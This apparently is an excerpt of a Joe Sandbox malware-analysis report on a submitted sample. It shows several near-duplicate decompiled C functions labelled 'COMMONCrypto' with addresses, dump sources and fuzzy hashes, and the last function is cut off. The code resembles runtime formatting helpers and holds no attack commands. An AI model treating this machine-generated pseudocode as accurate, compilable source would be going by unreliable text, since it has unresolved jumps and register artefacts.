                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C50568 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                                                              			E00007FF77FF735C50568(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t86;
				signed int _t90;
				void* _t110;
				intOrPtr _t111;
				signed int _t118;
				intOrPtr _t129;
				void* _t133;
				void* _t140;
				void* _t143;
				intOrPtr _t149;
				void* _t156;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t133 = __rcx;
				bpl = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				_t110 = _t86 - 5;
				if (_t110 > 0) goto 0x35c5064f;
				if (_t110 == 0) goto 0x35c505b8;
				_t111 = _t86;
				if (_t111 == 0) goto 0x35c506a3;
				if (_t111 == 0) goto 0x35c50627;
				if (_t111 == 0) goto 0x35c50600;
				if (_t111 == 0) goto 0x35c506a3;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x35c5066f;
				_t90 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x35c505ea;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x35c505ea;
				 *(__rcx + 0x28) = _t90 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x35c506ce;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x35c506e5;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x35c50621;
				goto 0x35c505d3;
				goto 0x35c505d3;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t118 == 0) goto 0x35c50649;
				goto 0x35c505d3;
				goto 0x35c505d3;
				if (_t118 == 0) goto 0x35c505b8;
				if (_t118 == 0) goto 0x35c505b8;
				if (_t118 == 0) goto 0x35c505b8;
				goto 0x35c505a6;
				_t129 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t129 + 0x30)) = 1;
				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF735C59330( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
				goto 0x35c50738;
				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
				if (0 == 0) goto 0x35c506c6;
				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
				goto 0x35c505d3;
				goto 0x35c505d3;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
				E00007FF77FF735C4F5F8(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
				if (_t149 != 0) goto 0x35c506ee;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
				 *((char*)(_t133 + 0x4c)) = 0;
				r8b = bpl;
				if (_t143 != 8) goto 0x35c50708;
				E00007FF77FF735C511A8(_t133, _t149);
				goto 0x35c5070f;
				E00007FF77FF735C50E14( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
				if (0 == 0) goto 0x35c50736;
				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x35c50728;
				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x35c50736;
				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
				return 1;
			}
















                                                                                                                                                                                                                              0x7ff735c50568
                                                                                                                                                                                                                              0x7ff735c5056d
                                                                                                                                                                                                                              0x7ff735c50572
                                                                                                                                                                                                                              0x7ff735c5057c
                                                                                                                                                                                                                              0x7ff735c5057f
                                                                                                                                                                                                                              0x7ff735c50582
                                                                                                                                                                                                                              0x7ff735c50585
                                                                                                                                                                                                                              0x7ff735c50588
                                                                                                                                                                                                                              0x7ff735c5058e
                                                                                                                                                                                                                              0x7ff735c50590
                                                                                                                                                                                                                              0x7ff735c50592
                                                                                                                                                                                                                              0x7ff735c5059b
                                                                                                                                                                                                                              0x7ff735c505a4
                                                                                                                                                                                                                              0x7ff735c505a9
                                                                                                                                                                                                                              0x7ff735c505b2
                                                                                                                                                                                                                              0x7ff735c505b8
                                                                                                                                                                                                                              0x7ff735c505c0
                                                                                                                                                                                                                              0x7ff735c505da
                                                                                                                                                                                                                              0x7ff735c505df
                                                                                                                                                                                                                              0x7ff735c505e7
                                                                                                                                                                                                                              0x7ff735c505ee
                                                                                                                                                                                                                              0x7ff735c505f4
                                                                                                                                                                                                                              0x7ff735c505fb
                                                                                                                                                                                                                              0x7ff735c50608
                                                                                                                                                                                                                              0x7ff735c50618
                                                                                                                                                                                                                              0x7ff735c5061f
                                                                                                                                                                                                                              0x7ff735c50625
                                                                                                                                                                                                                              0x7ff735c5062f
                                                                                                                                                                                                                              0x7ff735c50639
                                                                                                                                                                                                                              0x7ff735c50640
                                                                                                                                                                                                                              0x7ff735c50647
                                                                                                                                                                                                                              0x7ff735c5064d
                                                                                                                                                                                                                              0x7ff735c50652
                                                                                                                                                                                                                              0x7ff735c5065b
                                                                                                                                                                                                                              0x7ff735c50664
                                                                                                                                                                                                                              0x7ff735c5066a
                                                                                                                                                                                                                              0x7ff735c5066f
                                                                                                                                                                                                                              0x7ff735c50673
                                                                                                                                                                                                                              0x7ff735c50676
                                                                                                                                                                                                                              0x7ff735c5067d
                                                                                                                                                                                                                              0x7ff735c50681
                                                                                                                                                                                                                              0x7ff735c5068c
                                                                                                                                                                                                                              0x7ff735c50691
                                                                                                                                                                                                                              0x7ff735c50697
                                                                                                                                                                                                                              0x7ff735c5069e
                                                                                                                                                                                                                              0x7ff735c506ab
                                                                                                                                                                                                                              0x7ff735c506bb
                                                                                                                                                                                                                              0x7ff735c506bd
                                                                                                                                                                                                                              0x7ff735c506c1
                                                                                                                                                                                                                              0x7ff735c506c9
                                                                                                                                                                                                                              0x7ff735c506d9
                                                                                                                                                                                                                              0x7ff735c506e0
                                                                                                                                                                                                                              0x7ff735c506e8
                                                                                                                                                                                                                              0x7ff735c506ea
                                                                                                                                                                                                                              0x7ff735c506ee
                                                                                                                                                                                                                              0x7ff735c506f2
                                                                                                                                                                                                                              0x7ff735c506fc
                                                                                                                                                                                                                              0x7ff735c50701
                                                                                                                                                                                                                              0x7ff735c50706
                                                                                                                                                                                                                              0x7ff735c5070a
                                                                                                                                                                                                                              0x7ff735c50717
                                                                                                                                                                                                                              0x7ff735c5071d
                                                                                                                                                                                                                              0x7ff735c50726
                                                                                                                                                                                                                              0x7ff735c50728
                                                                                                                                                                                                                              0x7ff735c50730
                                                                                                                                                                                                                              0x7ff735c50733
                                                                                                                                                                                                                              0x7ff735c5074c

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 26f7617e280cadc1408041bdbda347d493751db1cf9006a829ea8c4e48882b0c
                                                                                                                                                                                                                              • Instruction ID: 11e59a48cc469a93b053994a10116e4e134cf18e2154130fad4c22f9ba9ae1e3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26f7617e280cadc1408041bdbda347d493751db1cf9006a829ea8c4e48882b0c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5351B1B3A0861392E7689F66C15433DA7A0EB54F5CF940535CF49A7798CF28EC41D790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C50194 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                                                              			E00007FF77FF735C50194(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t86;
				signed int _t90;
				void* _t110;
				intOrPtr _t111;
				signed int _t118;
				intOrPtr _t129;
				void* _t133;
				void* _t140;
				void* _t143;
				intOrPtr _t149;
				void* _t156;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t133 = __rcx;
				bpl = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				_t110 = _t86 - 5;
				if (_t110 > 0) goto 0x35c5027b;
				if (_t110 == 0) goto 0x35c501e4;
				_t111 = _t86;
				if (_t111 == 0) goto 0x35c502cf;
				if (_t111 == 0) goto 0x35c50253;
				if (_t111 == 0) goto 0x35c5022c;
				if (_t111 == 0) goto 0x35c502cf;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x35c5029b;
				_t90 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x35c50216;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x35c50216;
				 *(__rcx + 0x28) = _t90 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x35c502fa;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x35c50311;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x35c5024d;
				goto 0x35c501ff;
				goto 0x35c501ff;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t118 == 0) goto 0x35c50275;
				goto 0x35c501ff;
				goto 0x35c501ff;
				if (_t118 == 0) goto 0x35c501e4;
				if (_t118 == 0) goto 0x35c501e4;
				if (_t118 == 0) goto 0x35c501e4;
				goto 0x35c501d2;
				_t129 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t129 + 0x30)) = 1;
				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF735C59330( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
				goto 0x35c50364;
				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
				if (0 == 0) goto 0x35c502f2;
				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
				goto 0x35c501ff;
				goto 0x35c501ff;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
				_t51 = _t133 + 0x50; // 0xc8
				E00007FF77FF735C4F5F8(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
				if (_t149 != 0) goto 0x35c5031a;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
				 *((char*)(_t133 + 0x4c)) = 0;
				r8b = bpl;
				if (_t143 != 8) goto 0x35c50334;
				E00007FF77FF735C510A4(0, _t133, _t149);
				goto 0x35c5033b;
				E00007FF77FF735C50D10( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
				if (0 == 0) goto 0x35c50362;
				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x35c50354;
				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x35c50362;
				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
				return 1;
			}
















                                                                                                                                                                                                                              0x7ff735c50194
                                                                                                                                                                                                                              0x7ff735c50199
                                                                                                                                                                                                                              0x7ff735c5019e
                                                                                                                                                                                                                              0x7ff735c501a8
                                                                                                                                                                                                                              0x7ff735c501ab
                                                                                                                                                                                                                              0x7ff735c501ae
                                                                                                                                                                                                                              0x7ff735c501b1
                                                                                                                                                                                                                              0x7ff735c501b4
                                                                                                                                                                                                                              0x7ff735c501ba
                                                                                                                                                                                                                              0x7ff735c501bc
                                                                                                                                                                                                                              0x7ff735c501be
                                                                                                                                                                                                                              0x7ff735c501c7
                                                                                                                                                                                                                              0x7ff735c501d0
                                                                                                                                                                                                                              0x7ff735c501d5
                                                                                                                                                                                                                              0x7ff735c501de
                                                                                                                                                                                                                              0x7ff735c501e4
                                                                                                                                                                                                                              0x7ff735c501ec
                                                                                                                                                                                                                              0x7ff735c50206
                                                                                                                                                                                                                              0x7ff735c5020b
                                                                                                                                                                                                                              0x7ff735c50213
                                                                                                                                                                                                                              0x7ff735c5021a
                                                                                                                                                                                                                              0x7ff735c50220
                                                                                                                                                                                                                              0x7ff735c50227
                                                                                                                                                                                                                              0x7ff735c50234
                                                                                                                                                                                                                              0x7ff735c50244
                                                                                                                                                                                                                              0x7ff735c5024b
                                                                                                                                                                                                                              0x7ff735c50251
                                                                                                                                                                                                                              0x7ff735c5025b
                                                                                                                                                                                                                              0x7ff735c50265
                                                                                                                                                                                                                              0x7ff735c5026c
                                                                                                                                                                                                                              0x7ff735c50273
                                                                                                                                                                                                                              0x7ff735c50279
                                                                                                                                                                                                                              0x7ff735c5027e
                                                                                                                                                                                                                              0x7ff735c50287
                                                                                                                                                                                                                              0x7ff735c50290
                                                                                                                                                                                                                              0x7ff735c50296
                                                                                                                                                                                                                              0x7ff735c5029b
                                                                                                                                                                                                                              0x7ff735c5029f
                                                                                                                                                                                                                              0x7ff735c502a2
                                                                                                                                                                                                                              0x7ff735c502a9
                                                                                                                                                                                                                              0x7ff735c502ad
                                                                                                                                                                                                                              0x7ff735c502b8
                                                                                                                                                                                                                              0x7ff735c502bd
                                                                                                                                                                                                                              0x7ff735c502c3
                                                                                                                                                                                                                              0x7ff735c502ca
                                                                                                                                                                                                                              0x7ff735c502d7
                                                                                                                                                                                                                              0x7ff735c502e7
                                                                                                                                                                                                                              0x7ff735c502e9
                                                                                                                                                                                                                              0x7ff735c502ed
                                                                                                                                                                                                                              0x7ff735c502f5
                                                                                                                                                                                                                              0x7ff735c50305
                                                                                                                                                                                                                              0x7ff735c50308
                                                                                                                                                                                                                              0x7ff735c5030c
                                                                                                                                                                                                                              0x7ff735c50314
                                                                                                                                                                                                                              0x7ff735c50316
                                                                                                                                                                                                                              0x7ff735c5031a
                                                                                                                                                                                                                              0x7ff735c5031e
                                                                                                                                                                                                                              0x7ff735c50328
                                                                                                                                                                                                                              0x7ff735c5032d
                                                                                                                                                                                                                              0x7ff735c50332
                                                                                                                                                                                                                              0x7ff735c50336
                                                                                                                                                                                                                              0x7ff735c50343
                                                                                                                                                                                                                              0x7ff735c50349
                                                                                                                                                                                                                              0x7ff735c50352
                                                                                                                                                                                                                              0x7ff735c50354
                                                                                                                                                                                                                              0x7ff735c5035c
                                                                                                                                                                                                                              0x7ff735c5035f
                                                                                                                                                                                                                              0x7ff735c50378

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1d3f8ba6ec36ac75c940e033e4b7921e502076ec9f2bd6524a37681281f13cf1
                                                                                                                                                                                                                              • Instruction ID: 29572602fcbdb13c2cd9857d1ab37962a2c199e0de506ccd8ee157024f02acad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d3f8ba6ec36ac75c940e033e4b7921e502076ec9f2bd6524a37681281f13cf1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0351B0B3A0865392E728AE6AC45523DA7A0EB54F5CF940539CF0DA7399CF38EC41D760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5093C Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                                                              			E00007FF77FF735C5093C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t86;
				signed int _t90;
				void* _t110;
				intOrPtr _t111;
				signed int _t118;
				intOrPtr _t129;
				void* _t133;
				void* _t140;
				void* _t143;
				intOrPtr _t149;
				void* _t156;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t133 = __rcx;
				bpl = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				_t110 = _t86 - 5;
				if (_t110 > 0) goto 0x35c50a23;
				if (_t110 == 0) goto 0x35c5098c;
				_t111 = _t86;
				if (_t111 == 0) goto 0x35c50a77;
				if (_t111 == 0) goto 0x35c509fb;
				if (_t111 == 0) goto 0x35c509d4;
				if (_t111 == 0) goto 0x35c50a77;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x35c50a43;
				_t90 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x35c509be;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x35c509be;
				 *(__rcx + 0x28) = _t90 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x35c50aa2;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x35c50ab9;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x35c509f5;
				goto 0x35c509a7;
				goto 0x35c509a7;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t118 == 0) goto 0x35c50a1d;
				goto 0x35c509a7;
				goto 0x35c509a7;
				if (_t118 == 0) goto 0x35c5098c;
				if (_t118 == 0) goto 0x35c5098c;
				if (_t118 == 0) goto 0x35c5098c;
				goto 0x35c5097a;
				_t129 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t129 + 0x30)) = 1;
				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF735C59330( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
				goto 0x35c50b0c;
				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
				if (0 == 0) goto 0x35c50a9a;
				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
				goto 0x35c509a7;
				goto 0x35c509a7;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
				E00007FF77FF735C4F5F8(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
				if (_t149 != 0) goto 0x35c50ac2;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
				 *((char*)(_t133 + 0x4c)) = 0;
				r8b = bpl;
				if (_t143 != 8) goto 0x35c50adc;
				E00007FF77FF735C51314(_t133, _t149);
				goto 0x35c50ae3;
				E00007FF77FF735C50F74( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
				if (0 == 0) goto 0x35c50b0a;
				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x35c50afc;
				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x35c50b0a;
				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
				return 1;
			}
















                                                                                                                                                                                                                              0x7ff735c5093c
                                                                                                                                                                                                                              0x7ff735c50941
                                                                                                                                                                                                                              0x7ff735c50946
                                                                                                                                                                                                                              0x7ff735c50950
                                                                                                                                                                                                                              0x7ff735c50953
                                                                                                                                                                                                                              0x7ff735c50956
                                                                                                                                                                                                                              0x7ff735c50959
                                                                                                                                                                                                                              0x7ff735c5095c
                                                                                                                                                                                                                              0x7ff735c50962
                                                                                                                                                                                                                              0x7ff735c50964
                                                                                                                                                                                                                              0x7ff735c50966
                                                                                                                                                                                                                              0x7ff735c5096f
                                                                                                                                                                                                                              0x7ff735c50978
                                                                                                                                                                                                                              0x7ff735c5097d
                                                                                                                                                                                                                              0x7ff735c50986
                                                                                                                                                                                                                              0x7ff735c5098c
                                                                                                                                                                                                                              0x7ff735c50994
                                                                                                                                                                                                                              0x7ff735c509ae
                                                                                                                                                                                                                              0x7ff735c509b3
                                                                                                                                                                                                                              0x7ff735c509bb
                                                                                                                                                                                                                              0x7ff735c509c2
                                                                                                                                                                                                                              0x7ff735c509c8
                                                                                                                                                                                                                              0x7ff735c509cf
                                                                                                                                                                                                                              0x7ff735c509dc
                                                                                                                                                                                                                              0x7ff735c509ec
                                                                                                                                                                                                                              0x7ff735c509f3
                                                                                                                                                                                                                              0x7ff735c509f9
                                                                                                                                                                                                                              0x7ff735c50a03
                                                                                                                                                                                                                              0x7ff735c50a0d
                                                                                                                                                                                                                              0x7ff735c50a14
                                                                                                                                                                                                                              0x7ff735c50a1b
                                                                                                                                                                                                                              0x7ff735c50a21
                                                                                                                                                                                                                              0x7ff735c50a26
                                                                                                                                                                                                                              0x7ff735c50a2f
                                                                                                                                                                                                                              0x7ff735c50a38
                                                                                                                                                                                                                              0x7ff735c50a3e
                                                                                                                                                                                                                              0x7ff735c50a43
                                                                                                                                                                                                                              0x7ff735c50a47
                                                                                                                                                                                                                              0x7ff735c50a4a
                                                                                                                                                                                                                              0x7ff735c50a51
                                                                                                                                                                                                                              0x7ff735c50a55
                                                                                                                                                                                                                              0x7ff735c50a60
                                                                                                                                                                                                                              0x7ff735c50a65
                                                                                                                                                                                                                              0x7ff735c50a6b
                                                                                                                                                                                                                              0x7ff735c50a72
                                                                                                                                                                                                                              0x7ff735c50a7f
                                                                                                                                                                                                                              0x7ff735c50a8f
                                                                                                                                                                                                                              0x7ff735c50a91
                                                                                                                                                                                                                              0x7ff735c50a95
                                                                                                                                                                                                                              0x7ff735c50a9d
                                                                                                                                                                                                                              0x7ff735c50aad
                                                                                                                                                                                                                              0x7ff735c50ab4
                                                                                                                                                                                                                              0x7ff735c50abc
                                                                                                                                                                                                                              0x7ff735c50abe
                                                                                                                                                                                                                              0x7ff735c50ac2
                                                                                                                                                                                                                              0x7ff735c50ac6
                                                                                                                                                                                                                              0x7ff735c50ad0
                                                                                                                                                                                                                              0x7ff735c50ad5
                                                                                                                                                                                                                              0x7ff735c50ada
                                                                                                                                                                                                                              0x7ff735c50ade
                                                                                                                                                                                                                              0x7ff735c50aeb
                                                                                                                                                                                                                              0x7ff735c50af1
                                                                                                                                                                                                                              0x7ff735c50afa
                                                                                                                                                                                                                              0x7ff735c50afc
                                                                                                                                                                                                                              0x7ff735c50b04
                                                                                                                                                                                                                              0x7ff735c50b07
                                                                                                                                                                                                                              0x7ff735c50b20

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6fb8aa4ca7f998f2c0d447b08903b9e9566c96f93141003b00193b11ece4bb09
                                                                                                                                                                                                                              • Instruction ID: 5b89f25093bd8134357433e4ae62543e825543703c2d7a5f65c91d1adf00c9cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fb8aa4ca7f998f2c0d447b08903b9e9566c96f93141003b00193b11ece4bb09
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E651D0B7A1864392F728AE6AC15533CA7A0EB45F5CF940534CE4DA7798CB38EC41D3A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C581A8 Relevance: .1, Instructions: 126COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                                                                                              			E00007FF77FF735C581A8(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed int* _t73;
				signed long long _t75;
				signed long long _t77;
				signed long long _t78;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

